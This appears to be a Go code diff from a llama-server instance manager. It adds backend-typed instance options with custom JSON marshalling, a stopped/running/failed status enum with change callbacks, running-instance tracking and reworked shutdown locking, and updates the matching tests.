if opts.Port != 8080 { if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port) t.Errorf("Expected port 8080, got %d", inst.GetPort())
} }
// Check that defaults were applied // Check that defaults were applied
@@ -71,12 +76,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
AutoRestart: &autoRestart, AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts, MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay, RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions() opts := instance.GetOptions()
// Check that explicit values override defaults // Check that explicit values override defaults
@@ -100,17 +109,22 @@ func TestSetOptions(t *testing.T) {
} }
initialOptions := &instance.CreateInstanceOptions{ initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, initialOptions) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions, mockOnStatusChange)
// Update options // Update options
newOptions := &instance.CreateInstanceOptions{ newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf", Model: "/path/to/new-model.gguf",
Port: 8081, Port: 8081,
}, },
@@ -119,11 +133,11 @@ func TestSetOptions(t *testing.T) {
inst.SetOptions(newOptions) inst.SetOptions(newOptions)
opts := inst.GetOptions() opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" { if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model) t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
} }
if opts.Port != 8081 { if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port) t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
} }
// Check that defaults are still applied // Check that defaults are still applied
@@ -138,13 +152,17 @@ func TestGetProxy(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost", Host: "localhost",
Port: 8080, Port: 8080,
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Get proxy for the first time // Get proxy for the first time
proxy1, err := inst.GetProxy() proxy1, err := inst.GetProxy()
@@ -174,13 +192,17 @@ func TestMarshalJSON(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance) data, err := json.Marshal(instance)
if err != nil { if err != nil {
@@ -188,7 +210,7 @@ func TestMarshalJSON(t *testing.T) {
} }
// Check that JSON contains expected fields // Check that JSON contains expected fields
var result map[string]interface{} var result map[string]any
err = json.Unmarshal(data, &result) err = json.Unmarshal(data, &result)
if err != nil { if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err) t.Fatalf("JSON unmarshal failed: %v", err)
@@ -197,8 +219,8 @@ func TestMarshalJSON(t *testing.T) {
if result["name"] != "test-instance" { if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"]) t.Errorf("Expected name 'test-instance', got %v", result["name"])
} }
if result["running"] != false { if result["status"] != "stopped" {
t.Errorf("Expected running false, got %v", result["running"]) t.Errorf("Expected status 'stopped', got %v", result["status"])
} }
// Check that options are included // Check that options are included
@@ -210,20 +232,41 @@ func TestMarshalJSON(t *testing.T) {
if !ok { if !ok {
t.Error("Expected options to be a map") t.Error("Expected options to be a map")
} }
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"]) // Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
} }
} }
func TestUnmarshalJSON(t *testing.T) { func TestUnmarshalJSON(t *testing.T) {
jsonData := `{ jsonData := `{
"name": "test-instance", "name": "test-instance",
"running": true, "status": "running",
"options": { "options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false, "auto_restart": false,
"max_restarts": 5 "max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
} }
}` }`
@@ -236,19 +279,25 @@ func TestUnmarshalJSON(t *testing.T) {
if inst.Name != "test-instance" { if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name) t.Errorf("Expected name 'test-instance', got %q", inst.Name)
} }
if !inst.Running { if !inst.IsRunning() {
t.Error("Expected running to be true") t.Error("Expected status to be running")
} }
opts := inst.GetOptions() opts := inst.GetOptions()
if opts == nil { if opts == nil {
t.Fatal("Expected options to be set") t.Fatal("Expected options to be set")
} }
if opts.Model != "/path/to/model.gguf" { if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
} }
if opts.Port != 8080 { if opts.LlamaServerOptions == nil {
t.Errorf("Expected port 8080, got %d", opts.Port) t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
} }
if opts.AutoRestart == nil || *opts.AutoRestart { if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false") t.Error("Expected AutoRestart to be false")
@@ -298,12 +347,16 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts, MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay, RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instance := instance.NewInstance("test", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions() opts := instance.GetOptions()
if opts.MaxRestarts == nil { if opts.MaxRestarts == nil {


@@ -16,7 +16,7 @@ func (i *Process) Start() error {
i.mu.Lock() i.mu.Lock()
defer i.mu.Unlock() defer i.mu.Unlock()
if i.Running { if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name) return fmt.Errorf("instance %s is already running", i.Name)
} }
@@ -40,7 +40,6 @@ func (i *Process) Start() error {
} }
args := i.options.BuildCommandArgs() args := i.options.BuildCommandArgs()
i.ctx, i.cancel = context.WithCancel(context.Background()) i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...) i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
@@ -65,7 +64,7 @@ func (i *Process) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err) return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
} }
i.Running = true i.SetStatus(Running)
// Create channel for monitor completion signaling // Create channel for monitor completion signaling
i.monitorDone = make(chan struct{}) i.monitorDone = make(chan struct{})
@@ -82,7 +81,7 @@ func (i *Process) Start() error {
func (i *Process) Stop() error { func (i *Process) Stop() error {
i.mu.Lock() i.mu.Lock()
if !i.Running { if !i.IsRunning() {
// Even if not running, cancel any pending restart // Even if not running, cancel any pending restart
if i.restartCancel != nil { if i.restartCancel != nil {
i.restartCancel() i.restartCancel()
@@ -99,8 +98,8 @@ func (i *Process) Stop() error {
i.restartCancel = nil i.restartCancel = nil
} }
// Set running to false first to signal intentional stop // Set status to stopped first to signal intentional stop
i.Running = false i.SetStatus(Stopped)
// Clean up the proxy // Clean up the proxy
i.proxy = nil i.proxy = nil
@@ -110,19 +109,25 @@ func (i *Process) Stop() error {
i.mu.Unlock() i.mu.Unlock()
// Stop the process with SIGINT // Stop the process with SIGINT if cmd exists
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil { if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err) log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
} }
} }
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select { select {
case <-monitorDone: case <-monitorDone:
// Process exited normally // Process exited normally
case <-time.After(30 * time.Second): case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds // Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill() killErr := i.cmd.Process.Kill()
if killErr != nil { if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr) log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -144,8 +149,12 @@ func (i *Process) Stop() error {
return nil return nil
} }
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error { func (i *Process) WaitForHealthy(timeout int) error {
if !i.Running { if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name) return fmt.Errorf("instance %s is not running", i.Name)
} }
@@ -163,11 +172,17 @@ func (i *Process) WaitForHealthy(timeout int) error {
} }
	// Build the health check URL directly
-	host := opts.Host
+	var host string
+	var port int
+	switch opts.BackendType {
+	case backends.BackendTypeLlamaCpp:
+		host = opts.LlamaServerOptions.Host
+		port = opts.LlamaServerOptions.Port
+	}
	if host == "" {
		host = "localhost"
	}
-	healthURL := fmt.Sprintf("http://%s:%d/health", host, opts.Port)
+	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks // Create a dedicated HTTP client for health checks
client := &http.Client{ client := &http.Client{
@@ -227,12 +242,12 @@ func (i *Process) monitorProcess() {
i.mu.Lock() i.mu.Lock()
// Check if the instance was intentionally stopped // Check if the instance was intentionally stopped
if !i.Running { if !i.IsRunning() {
i.mu.Unlock() i.mu.Unlock()
return return
} }
i.Running = false i.SetStatus(Stopped)
i.logger.Close() i.logger.Close()
// Cancel any existing restart context since we're handling a new exit // Cancel any existing restart context since we're handling a new exit
@@ -257,6 +272,7 @@ func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters // Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions() shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart { if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock() i.mu.Unlock()
return return
} }

pkg/instance/options.go (new file, 141 lines)

@@ -0,0 +1,141 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// LlamaServerOptions contains the options for the llama server
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert LlamaServerOptions back to BackendOptions map for JSON
if c.BackendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs() []string {
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
return c.LlamaServerOptions.BuildCommandArgs()
}
}
return []string{}
}
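As a rough illustration of what the custom (un)marshalling above does with `backend_options`, the snippet below mirrors the two-step decode with local stand-in types: the generic map is re-marshalled and then decoded into the backend-specific struct. Field names and the "llama_cpp" value are assumed from the struct tags and test fixtures in this diff; this is a sketch, not the package's API:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Stand-ins for llamacpp.LlamaServerOptions and CreateInstanceOptions.
type LlamaServerOptions struct {
	Model string `json:"model"`
	Host  string `json:"host,omitempty"`
	Port  int    `json:"port,omitempty"`
}

type CreateInstanceOptions struct {
	BackendType    string         `json:"backend_type"`
	BackendOptions map[string]any `json:"backend_options,omitempty"`

	// Populated from BackendOptions after decoding.
	LlamaServerOptions *LlamaServerOptions `json:"-"`
}

func main() {
	payload := []byte(`{
		"backend_type": "llama_cpp",
		"backend_options": {"model": "/path/to/model.gguf", "port": 8080}
	}`)

	var opts CreateInstanceOptions
	if err := json.Unmarshal(payload, &opts); err != nil {
		panic(err)
	}

	// Second step: map -> JSON -> typed backend options.
	if opts.BackendType == "llama_cpp" && opts.BackendOptions != nil {
		raw, _ := json.Marshal(opts.BackendOptions)
		opts.LlamaServerOptions = &LlamaServerOptions{}
		if err := json.Unmarshal(raw, opts.LlamaServerOptions); err != nil {
			panic(err)
		}
	}

	fmt.Println(opts.LlamaServerOptions.Model, opts.LlamaServerOptions.Port)
	// Output: /path/to/model.gguf 8080
}
```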

pkg/instance/status.go (new file, 70 lines)

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}
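The effect of the two methods above is that statuses round-trip by name ("stopped"/"running"/"failed"), so persisted instance files and API responses carry readable strings rather than raw integers, and unknown names degrade to Stopped. A short usage sketch, assuming it is compiled inside the llamactl module so the import path resolves:

```go
package main

import (
	"encoding/json"
	"fmt"

	"llamactl/pkg/instance" // path as used elsewhere in this diff
)

func main() {
	b, _ := json.Marshal(instance.Running)
	fmt.Println(string(b)) // "running"

	var s instance.InstanceStatus
	_ = json.Unmarshal([]byte(`"unknown"`), &s)
	fmt.Println(s == instance.Stopped) // true: unknown names fall back to Stopped
}
```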


@@ -13,7 +13,7 @@ func (i *Process) ShouldTimeout() bool {
i.mu.RLock() i.mu.RLock()
defer i.mu.RUnlock() defer i.mu.RUnlock()
if !i.Running || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 { if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false return false
} }


@@ -1,6 +1,7 @@
package instance_test package instance_test
import ( import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -37,12 +38,16 @@ func TestUpdateLastRequestTime(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic // Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime() inst.UpdateLastRequestTime()
@@ -56,12 +61,16 @@ func TestShouldTimeout_NotRunning(t *testing.T) {
idleTimeout := 1 // 1 minute idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout, IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration // Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() { if inst.ShouldTimeout() {
@@ -85,16 +94,20 @@ func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout, IdleTimeout: tt.idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Simulate running state // Simulate running state
inst.Running = true inst.SetStatus(instance.Running)
if inst.ShouldTimeout() { if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name) t.Errorf("Instance with %s should not timeout", tt.name)
@@ -111,13 +124,17 @@ func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
idleTimeout := 5 // 5 minutes idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout, IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
inst.Running = true mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now // Update last request time to now
inst.UpdateLastRequestTime() inst.UpdateLastRequestTime()
@@ -136,13 +153,17 @@ func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
idleTimeout := 1 // 1 minute idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout, IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
inst.Running = true mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time // Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now()) mockTime := NewMockTimeProvider(time.Now())
@@ -179,12 +200,16 @@ func TestTimeoutConfiguration_Validation(t *testing.T) {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout, IdleTimeout: tt.inputTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions() opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout { if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {


@@ -21,17 +21,20 @@ type InstanceManager interface {
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error) StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error) StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error) RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error) GetInstanceLogs(name string) (string, error)
Shutdown() Shutdown()
} }
type instanceManager struct { type instanceManager struct {
mu sync.RWMutex mu sync.RWMutex
instances map[string]*instance.Process instances map[string]*instance.Process
ports map[int]bool runningInstances map[string]struct{}
instancesConfig config.InstancesConfig ports map[int]bool
instancesConfig config.InstancesConfig
// Timeout checker // Timeout checker
timeoutChecker *time.Ticker timeoutChecker *time.Ticker
@@ -46,9 +49,10 @@ func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
} }
im := &instanceManager{ im := &instanceManager{
instances: make(map[string]*instance.Process), instances: make(map[string]*instance.Process),
ports: make(map[int]bool), runningInstances: make(map[string]struct{}),
instancesConfig: instancesConfig, ports: make(map[int]bool),
instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute), timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}), shutdownChan: make(chan struct{}),
@@ -121,10 +125,10 @@ func (im *instanceManager) persistInstance(instance *instance.Process) error {
func (im *instanceManager) Shutdown() { func (im *instanceManager) Shutdown() {
im.mu.Lock() im.mu.Lock()
defer im.mu.Unlock()
// Check if already shutdown // Check if already shutdown
if im.isShutdown { if im.isShutdown {
im.mu.Unlock()
return return
} }
im.isShutdown = true im.isShutdown = true
@@ -132,27 +136,32 @@ func (im *instanceManager) Shutdown() {
// Signal the timeout checker to stop // Signal the timeout checker to stop
close(im.shutdownChan) close(im.shutdownChan)
// Release lock temporarily to wait for goroutine // Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock() im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop // Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone <-im.shutdownDone
// Reacquire lock
im.mu.Lock()
// Now stop the ticker // Now stop the ticker
if im.timeoutChecker != nil { if im.timeoutChecker != nil {
im.timeoutChecker.Stop() im.timeoutChecker.Stop()
} }
// Stop instances without holding the manager lock
var wg sync.WaitGroup var wg sync.WaitGroup
wg.Add(len(im.instances)) wg.Add(len(runningInstances))
for name, inst := range im.instances {
if !inst.Running {
wg.Done() // If instance is not running, just mark it as done
continue
}
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) { go func(name string, inst *instance.Process) {
defer wg.Done() defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name) fmt.Printf("Stopping instance %s...\n", name)
@@ -160,7 +169,7 @@ func (im *instanceManager) Shutdown() {
if err := inst.Stop(); err != nil { if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err) fmt.Printf("Error stopping instance %s: %v\n", name, err)
} }
}(name, inst) }(runningNames[i], inst)
} }
wg.Wait() wg.Wait()
